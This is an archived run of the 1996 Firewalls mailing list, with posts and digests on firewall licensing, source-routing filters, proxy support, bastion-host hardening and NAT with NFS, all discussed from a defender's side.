mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15646 for ; Tue, 9 Jan 1996 13:23:22 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id MAA16933; Tue, 9 Jan 1996 12:41:54 -0800 Received: from bwh.harvard.edu(134.174.81.34) by mycroft via smap (V1.3mjr) id sma016899; Tue Jan 9 12:40:57 1996 Received: from mingus.harvard.edu (mingus.bwh.harvard.edu [134.174.81.51]) by bwh.harvard.edu (8.6.9/8.6.9) with SMTP id PAA18821; Tue, 9 Jan 1996 15:41:35 -0500 From: Adam Shostack Message-Id: <199601092041.PAA18821@bwh.harvard.edu> X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Subject: Re: Fw License To: smith@sctc.com (Rick Smith) Date: Tue, 9 Jan 1996 15:41:12 -0500 (EST) Cc: firewalls@greatcircle.com (Firewalls mailing list) In-Reply-To: <199601091702.LAA04266@shade.sctc.com> from "Rick Smith" at Jan 9, 96 11:02:05 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith wrote: | It probably depends on the vendor. Sidewinder is sold as a device, so | the costs are related to the number of Sidewinders bought, not the | traffic each one handles. | | Does anyone perceive a benefit to sites in charging according to the | number of hosts protected? Is there some situation in which such | charges might make sense? If your firewall is available on a software only basis, then it might make sense to have a different fee for smaller customers. If a company with 15 computers has an old 486 around that they want to use to handle their fractional T1, and your software can use that, then it might be a cost-effective way to go. There are lots of companies out there who don't want to spend $1000/computer to protect themselves, which is what some firewalls can cost over a small set of hosts. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Jan 9 18:01:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA23497 for firewalls-outgoing; Tue, 9 Jan 1996 17:50:59 -0800 (PST) Received: from cbn.cbn.com.sg ([203.120.18.128]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA23492 for ; Tue, 9 Jan 1996 17:50:54 -0800 (PST) Received: (from ngps@localhost) by cbn.cbn.com.sg (8.6.12/8.6.12) id JAA05351; Wed, 10 Jan 1996 09:44:09 +0800 Date: Wed, 10 Jan 1996 09:44:08 +0800 (SST) From: Ng Pheng Siong To: Rick Smith cc: firewalls@GreatCircle.COM, fubar@ranma.coc.powell-river.bc.ca Subject: Re: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support) In-Reply-To: <199601091649.KAA03813@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jan 1996, Rick Smith wrote: > Fubar of Powell River, BC writes: > > One of the things we're looking for, and it's > >something I've not seen mentioned here, is the ability to outgoing > >traffic based on destination IP/PORT AND source IP. > > The technique isn't hard to implement, so it's probably pretty common. > Sidewinder has it. The only "gotcha" is that a long list of access > permissions may eventually bog down the machine. So how long is long, for Sidewinder, say? Cheers. - PS -- Ng Pheng Siong NetCentre Pte Ltd * Singapore Finger for PGP key. From firewalls-owner Tue Jan 9 19:07:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA23784 for firewalls-outgoing; Tue, 9 Jan 1996 18:05:21 -0800 (PST) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA23779 for ; Tue, 9 Jan 1996 18:05:16 -0800 (PST) Received: from [38.11.94.121] by smtp2.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) id VAA01342; Tue, 9 Jan 1996 21:04:23 -0500 X-Sender: cd000674@pop3.interramp.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 9 Jan 1996 22:58:01 +0900 To: firewalls@GreatCircle.COM From: dolphin@interramp.com (Tidewater Cyberfish) Subject: Re: Fw License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Some vendors do this as a means to undercut their competitors. And some do it to better manage the growth of such elements as new product development, and the product customer support requirements of different sized organizations. >They are using the firewall product as a type of software license >and use it to scale the price of the firewall (making it dependent >on the number of hosts/users it is to support). It is particularly >useful in small companies which only have a handful of systems to >protect and don't expect any growth anytime soon and/or have very >limited budgets. Unless you sell a "one-size-fits-all" product" to a "one-size-only- needed-by-all" market, it's the only prudent way to do it. >In spite of this, I personally am not in favor of this type of >approach. >Sudden growth (mergers, acquisitions, etc) could impact the >licensing of >the firewall & either get the customer in hot water with >SPA or the >vendor or face a denial-of-service for those extra >connections until the >customer remembers to get an upgraded license. Yeah, in some organizations that are asleep at the wheel. But for the most part it just doesn't happens that way. First off mergers, acquisitions and other "sudden growth" occurances just do not have this kind of impact on corporate enterprise security. I have been involved in better than a dozen such "sudden growths" and these issues are part of the reason why it usually takes three to eighteen months to get through the "sign-off" on a merged or absorbed entity. To those involved in these exercises, security is at or very near the top of that list. Additionally, if a customer has purchased a decent firewall from a reputable vendor who offers a scalable product, who is paying attention to the post-sale needs, and downstream growth needs of his customer then there's little reason for handwringing. Most of the "it fell through the cracks" or "denial of service" problems I've encountered are due to someone just not paying attention to the issues that justify their paychecks. >This could be rather interesting if the person who ordered the firewall >>or was familiar with the licensing scheme wasn't around when the number >>of connections exceeded the license & no one else had a clue what was >>going on. At which time I would be strongly inclined to ask my CIO/DIRIRM for an explanation... rmck __________________________________________________ Bob McKisson Cypress Systems Corporation McLean, VA 22102 (703) 273-2150 Voice (703) 273-2151 FAX (703) 691-2434 STU-III pelican@interramp.com National Capital Region dolphin@interramp.com Norfolk/Chesapeake/VA Beach From firewalls-owner Tue Jan 9 20:22:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02690 for firewalls-outgoing; Tue, 9 Jan 1996 20:14:16 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA02682 for ; Tue, 9 Jan 1996 20:14:11 -0800 (PST) Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id XAA01788; Tue, 9 Jan 1996 23:12:59 -0500 Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id UAA26544; Tue, 9 Jan 1996 20:13:00 -0800 Message-ID: Date: 6 Jan 1996 01:41:06 -0800 From: "PDXML2" Subject: PLEASE RE-SEND, E-MAIL ADMI To: "firewalls-digest@GreatCircle.CO" X-Mailer: Mail*Link SMTP/QM 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail*Link(r) SMTP Firewalls-Digest V5 #8 Received: by pdxml2.mentorg.com with SMTP;6 Jan 1996 01:35:41 -0800 Received: from relay7.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id EAA22326; Sat, 6 Jan 1996 04:30:18 -0500 Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQzxib26519; Sat, 6 Jan 1996 04:29:17 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA17120 for firewalls-digest-outgoing; Sat, 6 Jan 1996 01:00:14 -0800 (PST) Date: Sat, 6 Jan 1996 01:00:14 -0800 (PST) Message-Id: <199601060900.BAA17120@miles.greatcircle.com> From: firewalls-digest-owner@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #8 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@uunet.uu.net Precedence: bulk Firewalls-Digest Saturday, 6 January 1996 Volume 05 : Number 008 In this issue: SSL and S-HTTP Proxy support Re: Security managing Cisco Routers Re: SSL and S-HTTP Proxy support Steps in building a firewall, Right or Wrong? See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: cbk@ingress.com (Charles B. Kaplan) Date: Fri, 5 Jan 1996 23:21:13 -0500 Subject: SSL and S-HTTP Proxy support >From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefor any proxy supporting HTTP should work with S-HTTP. Next, while SSL COULD be implimented accross multiple protocols, etc, the 'only' wide spread use presentally is via netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI out of the box proxys port 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things. NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That ofcourse is why BorderWare provides a 3'rd network interface for 'secured servers'. Well, enough plugging of BorderWare....if you didn't guess I resell it. Anyone care to either veryify or correct the above S-HTTP notes ? - -Charles Kaplan for more information on BorderWare call 800-254-7159 ------------------------------ From: Bill Husler Date: Fri, 5 Jan 1996 20:22:58 -0800 Subject: Re: Security managing Cisco Routers >>>At 02:15 PM 12/27/95 GMT, Pietro wrote: >>> >>>>My actual problem is to managed several Cisco Routers situated >>>>on a public network from a central site, from where there is no >>>>way to garantee secure communication. >>>> > >>I have heard that Firewall-1 will manage the configurations of CISCO >>routers remotely. I believe the way it works is that you set up the >>configuration or a Firewall-1 Administrative Workstations and it send >>some sort of encrypted/secured transmission to the router to downlowd the >>new config. >>Bill >> > >Although I'm not intimately familiar with the internal mechanisms of >Firewall-1, I do have a problem with the above paragraph, since we >do not (yet) support encrypted transport mechanisms. :-) > >- paul > >-- >Paul Ferguson || || >Consulting Engineering || || >Reston, Virginia USA |||| |||| >tel: +1.703.716.9538 ..:||||||:..:||||||:.. >e-mail: pferguso@cisco.com c i s c o S y s t e m s > > Paul, Your absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters. I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response. Bill ------------------------------ From: Bill Husler Date: Fri, 5 Jan 1996 20:46:16 -0800 Subject: Re: SSL and S-HTTP Proxy support >From: Brian W. McKenney, mckenney@smiley.mitre.org > >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. > >This is the information that I have: > >1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >2. KarlBridge/KarlBrouter: S-HTTP proxy >3. Milkyway Blackhole: S--HTTP >4. SOS Brimstone: S-HTTP proxy >5. Technologic Interceptor: S-HTTP proxy >6. V-One SmartWall: S-HTTP proxy > >License versions of TIS Gauntlet will support whatever the next Gauntlet >release supports. > You can add ANS Interlock to you list. Bill ------------------------------ From: bart@pu.com (Bart Rivard) Date: Sat, 6 Jan 1996 01:49:18 -0600 Subject: Steps in building a firewall, Right or Wrong? Hi, I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here is the steps I have taken tell me what you think. 1) Installed FreeBSD on a Pentium 100 with 32 MB of Ram and two Ethernet NICs 2) Configured the Kernel such that IP forwarding and Source routing are disabled. 3) Deleted all accounts on the system except root 4) Gave root a password with number, letters, uppercase and lowercase, 10 long 5) Deleted everything out of inetd.conf except DNS 6) Configured DNS so that the only machine it knows about is a Web server which is in the DMZ and the firewall machine and wildcard MX record. 7) Configured resolv.conf on firewall to point to the internal network DNS. 8) Turned off source routing on the CISCO 2500 router and added filters which disabled all UDP traffic except port DNS/53, all TCP inbound traffic except SMTP to firewall, News from specific news server to firewall http to web server in DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on router, what do you think? 9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to web proxy by network interface but don't know how? 10)Modified a mail program so that it read mail from port 25 and writes to disk mail messages. Completely dumb program. Does not handle distribution list, aliases or anything. I then pick mail up off of disk and send it to internal CC mail gateway. Was there shareware to do equivalent? Can sendmail pick mail up off of disk? Is it safe to have sendmail pick mail up off of disk and distribute? 11)Put TCP Wrapper around news server port to only except connection from our news provider at AT&T and internal network. Also use inn access control to limit access from internal network for reading news and news provider for dumping news. Well that about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server so we don't allow news to pass through firewall but the firewall doubles as a news server. Is it safe to use a firewall as a news server? Please comment!! Send all comments to bart@pu.com. TIA, Bart ------------------------------ End of Firewalls-Digest V5 #8 ***************************** To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM": unsubscribe firewalls-digest To subscribe, send the command "subscribe firewalls-digest" instead. If you want to subscribe or unsubscribe something other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls": subscribe firewalls-digest local-firewalls@your.domain.net A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls". Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number). From firewalls-owner Tue Jan 9 21:22:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA03606 for firewalls-outgoing; Tue, 9 Jan 1996 21:00:18 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA03601 for ; Tue, 9 Jan 1996 21:00:14 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id XAA15779; Tue, 9 Jan 1996 23:57:55 -0500 Date: Tue, 9 Jan 1996 23:57:55 -0500 (EST) From: Brain21 To: Neil cc: firewalls@GreatCircle.COM Subject: Re: Source Routed Packets In-Reply-To: <960105133833.212c@rmcs.cranfield.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 5 Jan 1996, Neil wrote: > I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel > with IP packet forwarding turned off. > > The only problem is that SunOS will still (I believe) allow IP source > routed packets through the bastion host. > This may be an ignorant question here, but are you able to filter on bit sequences on your machine, or just port #s??? If you can filter on specific bits, filter out, on the first 8 bits of the options field in the TCP packets (bits 161-168) when they have the following bit sequence: 10000011 This is loose source routing (strict source routing is the same bits, but w/ a sequence of 10001001). Quick summary/options field quasi-tutorial: 161 168 +-+-+-+-+-+-+-+-+ | | | | | | | | | (I know my ascii sucks) +-+-+-+-+-+-+-+-+ bit 161- "copied flag" states that options must be copied if packet is fragmented (so it's "1" for "yes" or "on"). bits 162-163 - All are "0" except for Internet Time Stamp (which="2" or "10" - decimal and binary respectively) bits 164-168 - Number or "ID" field - "3"=loose source routing, "9"=strict source routing (00011 and 01001 respectively) so you have - 1 00 00011 for loose, and 1 00 01001 for strict. This brings me to my next question. This is something that I have asked before, but I can't believe that only *1* firewall allows this!... What firewalls *WILL* allow you to filter on bit sequences like I illustrated above??? When I asked this last time the only answer that I got was that V-One will allow you to do this to create your own, more specific rules. Is that possible? Does only *ONE* vendor support this? Thanks, Brain21 From firewalls-owner Tue Jan 9 21:52:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04199 for firewalls-outgoing; Tue, 9 Jan 1996 21:44:30 -0800 (PST) Received: from tide03.microsoft.com (tide03.microsoft.com [131.107.3.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04193 for ; Tue, 9 Jan 1996 21:44:26 -0800 (PST) Received: by tide03.microsoft.com; id VAA20024; Tue, 9 Jan 1996 21:50:56 -0800 Received: from unknown(157.54.17.73) by tide03.microsoft.com via smap (g3.0.3) id xma020010; Tue, 9 Jan 96 21:50:36 -0800 Received: from xnet2 (xnet2.microsoft.com [157.54.17.205]) by imail1.microsoft.com (8.7.1/8.7.1) with SMTP id VAA29394 for ; Tue, 9 Jan 1996 21:46:09 -0800 (PST) X-Received: from xmtp3 by xnet2 with receive; Tue, 9 Jan 1996 21:43:03 -0800 X-Received: from RED-70-MSG by xmtp3 with recvsmtp; Tue, 9 Jan 1996 21:42:51 -0800 Received: by red-70-msg.itg.microsoft.com with Microsoft Exchange (IMC 4.20.611) id <01BADEDB.6DD21AC0@red-70-msg.itg.microsoft.com>; Tue, 9 Jan 1996 21:42:52 -0800 Message-ID: From: "Kurt Buff (Volt Comp)" To: "firewalls@greatcircle.com" Subject: ip subnetting Date: Tue, 9 Jan 1996 21:42:50 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.20.611 X-MsXMTID: xmtp3960110054251RECVSMTP[01.52.00]00000123-62072 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Many thanks to those who replied from a relative newbie. I have rfc 1878 and am reviewing it. I will probably have replies privately to those who helped, as this is not strictly on topic for this list Kurt From firewalls-owner Tue Jan 9 22:07:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04653 for firewalls-outgoing; Tue, 9 Jan 1996 21:58:15 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04648 for ; Tue, 9 Jan 1996 21:58:10 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id AAA16088; Wed, 10 Jan 1996 00:56:06 -0500 Date: Wed, 10 Jan 1996 00:56:06 -0500 (EST) From: Brain21 To: Frank Willoughby cc: firewalls@GreatCircle.COM, John Young Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601080441.AA17466@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to know this... if Shimomura is so good (an I actually believe that he may be) then why did he leave the r-utils enabled? Why did he not use TCPWrappers to prevent spoofing? Why did he allow people to see inside his network (Mitnick saw that there was a machine "X-something" that he believed was trusted by Shimomura's machine)? I mean, I believe that Shimomura knew of the possibility of this type of attack WAY ahead of time (like months or years). Why no encryption to stop this type of attack? Why did he not use random sequence numbers? Was he just SOOO overwhelmed by his own greatness that he ignored these things? There are those, so I've heard, that believe that his ego ended up getting the best of him (karma). I don't know him so I can not make a judgement either way, but which way does the evidence point? It just doesn't make sense. BTW, where did the "Official Spoofing Page" go? I think it used to be something like www.msen.com/tubed/spoofing.html or something like that. It went down a few months ago. Just wondering why... Brain21 From firewalls-owner Tue Jan 9 22:36:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04052 for firewalls-outgoing; Tue, 9 Jan 1996 21:37:54 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04047 for ; Tue, 9 Jan 1996 21:37:50 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id AAA15998; Wed, 10 Jan 1996 00:35:36 -0500 Date: Wed, 10 Jan 1996 00:35:36 -0500 (EST) From: Brain21 To: Bob Resino cc: grau@muc.de, firewalls@GreatCircle.COM Subject: Re: Off-Topic: Selling Firewalls In-Reply-To: <9601081347.AA15571@dsn20> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 8 Jan 1996, Bob Resino wrote: > > - how to draw network designs > > - how to calculate network topology, eg. IP-numbers and netmasks > > - how to calculate the costs for the equipment (firewalls, routers ...) > > - how to ... > > > You might want to think about a CAD package, like > Intergraph Microstation or IsiCad. The Microstation Don't know what they cost, but I believe that Microstation is MORE expensive than AutoCAD, which runs in the neighborhood of $5000. That's a little high for what the original poster wants to do, I think. Besides, he is obviously running Windows (mention of Powerpoint), and Microstation is UNIX isn't it? (not sure). I know that Freelance Graphic blows for this kind of stuff. Perhaps something like Corel Draw may be better? The latest version is 6.0, and I think you can get 5.0 and 4 for less than $100 or so now. This and a decent clipart package (or look, there is a usenet group for clip-art, I think) would be all that you really need for network diagrams. Then you could import these into Excel or 1-2-3 or something if you need to have cost projections and network diagrams on one page. As for IP addresses, etc. I think you are on your own there. Brain21 From firewalls-owner Tue Jan 9 23:07:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA06458 for firewalls-outgoing; Tue, 9 Jan 1996 23:00:15 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA06453 for ; Tue, 9 Jan 1996 23:00:10 -0800 (PST) Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id BAA10206; Wed, 10 Jan 1996 01:58:58 -0500 Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id WAA29468; Tue, 9 Jan 1996 22:58:41 -0800 Message-ID: Date: 7 Jan 1996 01:56:55 -0800 From: "PDXML2" Subject: PLEASE RE-SEND, E-MAIL ADMI To: "firewalls-digest@GreatCircle.CO" X-Mailer: Mail*Link SMTP/QM 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail*Link(r) SMTP Firewalls-Digest V5 #9 Received: by pdxml2.mentorg.com with SMTP;7 Jan 1996 01:51:21 -0800 Received: from relay7.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id EAA21637; Sun, 7 Jan 1996 04:45:54 -0500 Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQzxlu21430; Sun, 7 Jan 1996 04:37:25 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA07197 for firewalls-digest-outgoing; Sun, 7 Jan 1996 01:00:21 -0800 (PST) Date: Sun, 7 Jan 1996 01:00:21 -0800 (PST) Message-Id: <199601070900.BAA07197@miles.greatcircle.com> From: firewalls-digest-owner@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #9 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@uunet.uu.net Precedence: bulk Firewalls-Digest Sunday, 7 January 1996 Volume 05 : Number 009 In this issue: RE: Bastion netmask query Re: NAT & NFS ? Re: Steps in building a firewall, Right or Wrong? Undeliverable Mail See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: Paul Ferguson Date: Sat, 06 Jan 1996 08:09:15 -0500 Subject: RE: Bastion netmask query Sure, you could hack something together to do this, but why not simply use RFC-1878 instead? - - paul At 10:00 PM 1/4/96 -0800, Kurt Buff (Volt Comp) wrote: >It seems to me that someone with half a brain (not me, I only have 1/4) >could write a simple program (PERL, VB, ??) that would take some input >(number of nodes, number of segments, network address(es), etc.) and output >some reasonable netmasking and segmenting suggestions, including >forbidden/unwise host addresses (due to broadcast address conflicts, etc.). >Does anyone know of such a beastie? Or would this really be such a hard >thing to write? > >Kurt > - -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s ------------------------------ From: jon@london.hcsc.com (Jon Shallow) Date: Sat, 6 Jan 96 11:49:05 GMT Subject: Re: NAT & NFS ? Darren, Some NAT definitions I am using to answer your NFS question. NAT: The change of an IP address within a packet to hide or withold IP addresses that are not 'public'. This is implied when proxies are in use, but also is done in the IP layer. external: One of potentially many interfaces which NATs packets as they pass over the interface. internal: One of potentially many interfaces which does not NAT packets. session: Transmission and receipt of packets which includes TCP/UDP transmits and ICMP error receipts. Any packet 'session' can be initiated from internal to external as internal host has full visibility of external address space. The external host will only see packets coming from the firewall. Returned packets will get forwarded (with IP address translated) back to the originator. Any packet 'session' initiated from external will never get to internal as there is absolutely no visibility of internal address space. The above is true for all TCP, UDP, RPC, and ICMP packets. (For those that do not know, RPC is a protocol using TCP or UDP packets as a carrier. NFS then uses RPC for communication protocol.) Now to NFS ..... If an external host has a NFS exported file system, any internal host can mount that file system (as permitted by the normal NFS export rules). If NAT takes place at the IP layer, no extra work or enabling is required at the filrewall. The things to be aware of 1. The external host will see the NFS read/write etc activity coming from the firewall IP address, not the internal host IP address. The exports file needs to reflect this. 2. The external host will see the mount request coming from the firewall IP address, and embedded within the mount request RPC packet is the name of the host doing the mount request. The external host will lookup this embedded host name, and if the IP address is not the same as the firewall address, the mount request is refused. You will need to 'fake' the internal hosts IP address on the external host if the firewall cannot translate the embedded host name. Regards Jon BTW Are there many firewalls out there that can filter on RPC as NFS through a firewall is scary. Harris CyberGuard can. > In some mail from Jon Shallow, sie said: > > > > This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get > > suitably rewritten - even the ICMP error codes. > > > > The 'inside' system can initiate talk to the 'external' system, but the > > 'external' system has no knowledge of the 'internal' IP address - just > > the firewall. > > This doesn't quite answer what I was wondering... > > I'm particularly interested in what this means for NFS...does it mean > your internal systems need to be setup to allow the firewall to NFS to > them so that external systems can be provided with NFS ? > > > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > > > and server, actively rewriting the addresses in all the packets involved ? > > > If so, have any problems or unexpected situations arisen ? > > darren > ------------------------------ From: "Joe Smith (Really!)" Date: Sat, 6 Jan 1996 19:50:40 -0600 (CST) Subject: Re: Steps in building a firewall, Right or Wrong? On Sat, 6 Jan 1996, Bart Rivard wrote: > 3) Deleted all accounts on the system except root Unless you are limiting access to the system from the console, I would create one account (secured as you did root) to login to the system, and then su to root to do admin work. ------------------------------ From: "Server #7000007" Date: 6 Jan 1996 21:57:29 U Subject: Undeliverable Mail Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V5 #7 Sent: Fri, Jan 5, 1996 9:36 PM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sat, Jan 6, 1996 9:57 PM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. ------------------------------ End of Firewalls-Digest V5 #9 ***************************** To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM": unsubscribe firewalls-digest To subscribe, send the command "subscribe firewalls-digest" instead. If you want to subscribe or unsubscribe something other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls": subscribe firewalls-digest local-firewalls@your.domain.net A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls". Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number). From firewalls-owner Tue Jan 9 23:25:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA06828 for firewalls-outgoing; Tue, 9 Jan 1996 23:16:13 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id XAA06805 for ; Tue, 9 Jan 1996 23:16:01 -0800 (PST) Message-Id: <199601100716.XAA06805@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA020987851; Wed, 10 Jan 1996 18:10:51 +1100 From: Darren Reed Subject: Re: Source Routed Packets To: brain21@montag33.residence.gatech.edu (Brain21) Date: Wed, 10 Jan 1996 18:10:51 +1100 (EDT) Cc: CARSON@rmcs.cranfield.ac.uk, firewalls@GreatCircle.COM In-Reply-To: from "Brain21" at Jan 9, 96 11:57:55 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Brain21, sie said: [...] > What firewalls *WILL* allow you to filter on bit sequences like I > illustrated above??? When I asked this last time the only answer that I > got was that V-One will allow you to do this to create your own, more > specific rules. Is that possible? Does only *ONE* vendor support this? This is probably an overkill in functionality vs performance. Why is this such a problem ? Because for every rule which allows you to define an arbitary bit sequence, you have to parse the packet a new way to see if it matches. For a packet with IP options, it would mean checking all the IP options present to see if any match the mask. For IP options, this is somewhat not so useful, as there is a limited number which are defined, and even fewer which work end-to-end in most unix boxes. Filter languages, such as that from Cisco or IP Filter will recognise a large number (all) of the defined IP options. I'd thus expect V-One's firewall to be twice as slow as, say, FW-1. From firewalls-owner Wed Jan 10 00:10:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA07935 for firewalls-outgoing; Tue, 9 Jan 1996 23:53:09 -0800 (PST) Received: from uud01.capvolmac.nl (uud01.capvolmac.nl [193.78.92.33]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA07930 for ; Tue, 9 Jan 1996 23:53:04 -0800 (PST) Received: from inetgate.capvolmac.nl by uud01.capvolmac.nl (uud01 3.2/UCB 5.64/4.03) id AA15132; Wed, 10 Jan 1996 08:51:32 +0100 Received: from WUD00-Message_Server by inetgate.capvolmac.nl with Novell_GroupWise; Wed, 10 